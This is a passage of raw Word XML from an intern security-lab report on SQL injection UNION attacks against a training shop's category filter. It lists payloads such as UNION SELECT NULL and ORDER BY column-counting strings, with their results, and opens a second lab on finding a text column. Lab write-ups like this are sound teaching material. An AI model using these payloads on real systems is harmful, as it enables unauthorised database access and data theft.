        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payloads tested in category filter URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B3F98" w14:textId="79316B01" w:rsidR="006939F6" w:rsidRDefault="00083234" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00083234">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION select NULL--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006939F6" w:rsidRPr="004D516A">
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:t>internal server error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213913F" w14:textId="4B6B4556" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00083234">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4FC550" wp14:editId="6156CD8A">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="958714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14744" name="Picture 958714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63B7EE5C" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22401C69" w14:textId="53D0CB1B" w:rsidR="006939F6" w:rsidRDefault="00083234" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0CB150" wp14:editId="34A96364">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1157791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1429" name="Picture 11577914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108EAB95" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5938E3" w14:textId="1F8072BA" w:rsidR="006939F6" w:rsidRDefault="00083234" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00083234">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION select NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00083234">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="006939F6" w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006939F6" w:rsidRPr="004D516A">
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidR="001A38D5">
        <w:t>internal server error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E83A6E" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="00CA2406" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091638E6" w14:textId="38AD86FD" w:rsidR="006939F6" w:rsidRDefault="001A38D5" w:rsidP="006939F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74205C3E" wp14:editId="116E20B4">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="209163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 name="Picture 2091633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3491861A" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6"/>
    <w:p w14:paraId="4DD27646" w14:textId="039BF762" w:rsidR="006939F6" w:rsidRDefault="001A38D5" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A38D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION select NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, NULL, NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="001A38D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006939F6" w:rsidRPr="004D516A">
        <w:t>→ worked (</w:t>
      </w:r>
      <w:r w:rsidRPr="001A38D5">
        <w:t xml:space="preserve">the screen says, "Congratulations, you solved the lab!", which means we got the number of columns </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A38D5">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A38D5">
        <w:t xml:space="preserve"> the number of columns is same as of the above query </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A38D5">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A38D5">
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidR="006939F6" w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E104BAD" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="00CA2406" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C83CF13" w14:textId="2878B6DC" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="003A1F8D" w:rsidP="006939F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C2B87AD" wp14:editId="210B9CBC">
            <wp:extent cx="5731510" cy="3137535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="11114198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9882" name="Picture 11114198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inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006939F6">
        <w:pict w14:anchorId="0053E5C8">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2852A815" w14:textId="5E5F8DD3" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Way 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07217487" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="004D516A" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determined number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29800555" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="004D516A" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payloads tested in category filter URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5960C0" w14:textId="77777777" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' ORDER BY 1--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → worked (sorted by 1st column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here, maybe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id column as it isn’t visible</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E17B8C" w14:textId="4BE633C2" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00446A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595C7FAD" wp14:editId="7A266272">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="15351262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26221" name="Picture 15351262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6F4D5C82" w14:textId="6191AA1C" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E2DF57" w14:textId="2C37EBFC" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9EC6AC" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="004D516A" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4538ABEC" w14:textId="77777777" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' ORDER BY 2-- </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>→ worked (sorted by 2nd column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here, the name of the gift items</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2844E4" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="00CA2406" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7B598" w14:textId="63ECEAD7" w:rsidR="001F5303" w:rsidRDefault="00446A9F" w:rsidP="001F5303">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12FA179E" wp14:editId="7194F275">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="18065694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9432" name="Picture 18065694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052E6F19" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="004D516A" w:rsidRDefault="001F5303" w:rsidP="001F5303"/>
    <w:p w14:paraId="6168D49E" w14:textId="77777777" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' ORDER BY 3--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → worked (sorted by </w:t>
      </w:r>
      <w:r>
        <w:t>3rd</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here, the prices of the gift items</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB196A1" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="00CA2406" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC612C" w14:textId="595D6E0A" w:rsidR="001F5303" w:rsidRDefault="00717351" w:rsidP="001F5303">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7053693F" wp14:editId="29FB14BD">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="65824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4055" name="Picture 65824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3758C826" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="00900ED8" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00923976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → internal server error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64033AAF" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="00923976" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF4674" w14:textId="51A8ECB1" w:rsidR="001F5303" w:rsidRDefault="00717351" w:rsidP="001F5303">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1375"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="588D226F" wp14:editId="7EAF6678">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="751018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8376" name="Picture 7510183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786ECC25" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="004D516A" w:rsidRDefault="001F5303" w:rsidP="001F5303"/>
    <w:p w14:paraId="4D9A98F5" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="004D516A" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:t xml:space="preserve"> – 1 = </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> columns in query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC22C11" w14:textId="77777777" w:rsidR="001F5303" w:rsidRPr="001F5303" w:rsidRDefault="001F5303" w:rsidP="001F5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B44CB54" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Team Members Involved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593922B1" w14:textId="54FE16D4" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Sarthaka</w:t>
      </w:r>
      <w:r w:rsidR="0099054D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0099054D">
        <w:t>Subhankara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0099054D">
        <w:t xml:space="preserve"> Singh, Intern Id – 438</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C41ADA" w14:textId="4A26F34E" w:rsidR="0099054D" w:rsidRDefault="0099054D" w:rsidP="0099054D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0099054D">
        <w:t xml:space="preserve">Rahul </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>idha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t xml:space="preserve">Intern </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>d </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t> 194</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751DB2F" w14:textId="219822C4" w:rsidR="0099054D" w:rsidRPr="004D516A" w:rsidRDefault="0099054D" w:rsidP="0099054D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0099054D">
        <w:t>Saswata Som</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>Intern Id - 364</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A02CC" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Date Completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA4E1C" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> August 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4268CF" w14:textId="77777777" w:rsidR="001F5303" w:rsidRDefault="001F5303" w:rsidP="003B7E47"/>
    <w:p w14:paraId="56E4B353" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47"/>
    <w:p w14:paraId="5642CBAA" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47"/>
    <w:p w14:paraId="28CBFC95" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47"/>
    <w:p w14:paraId="51C2D475" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47"/>
    <w:p w14:paraId="2FD5257B" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47"/>
    <w:p w14:paraId="1FAB1D6C" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47"/>
    <w:p w14:paraId="170587FA" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5025068F" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9CED10" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7566F9C7" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8E9B99" w14:textId="77777777" w:rsidR="00D50FC0" w:rsidRDefault="00D50FC0" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A0659E" w14:textId="0A8940FB" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Lab Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B988B" w14:textId="7697F638" w:rsidR="003B7E47" w:rsidRPr="002F3F26" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r w:rsidRPr="002F3F26">
        <w:t>SQL injection UNION attack, finding a column containing text</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3F26">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F990669" w14:textId="77777777" w:rsidR="002F3F26" w:rsidRDefault="002F3F26" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E77FAB" w14:textId="636901EC" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Vulnerability Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111968BD" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r w:rsidRPr="002F3F26">
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC321E" w14:textId="77777777" w:rsidR="002F3F26" w:rsidRPr="002F3F26" w:rsidRDefault="002F3F26" w:rsidP="003B7E47"/>
    <w:p w14:paraId="16D3D52F" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B7E7A" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r w:rsidRPr="003B7E47">
        <w:t>Exploited a SQL injection vulnerability in the product category filter to identify which column in the query output could accept string data. This was done by systematically injecting UNION SELECT payloads with text values and observing whether the application displayed them. Once a column capable of displaying text was identified, it could later be used to extract sensitive data from the database.</w:t>
      </w:r>
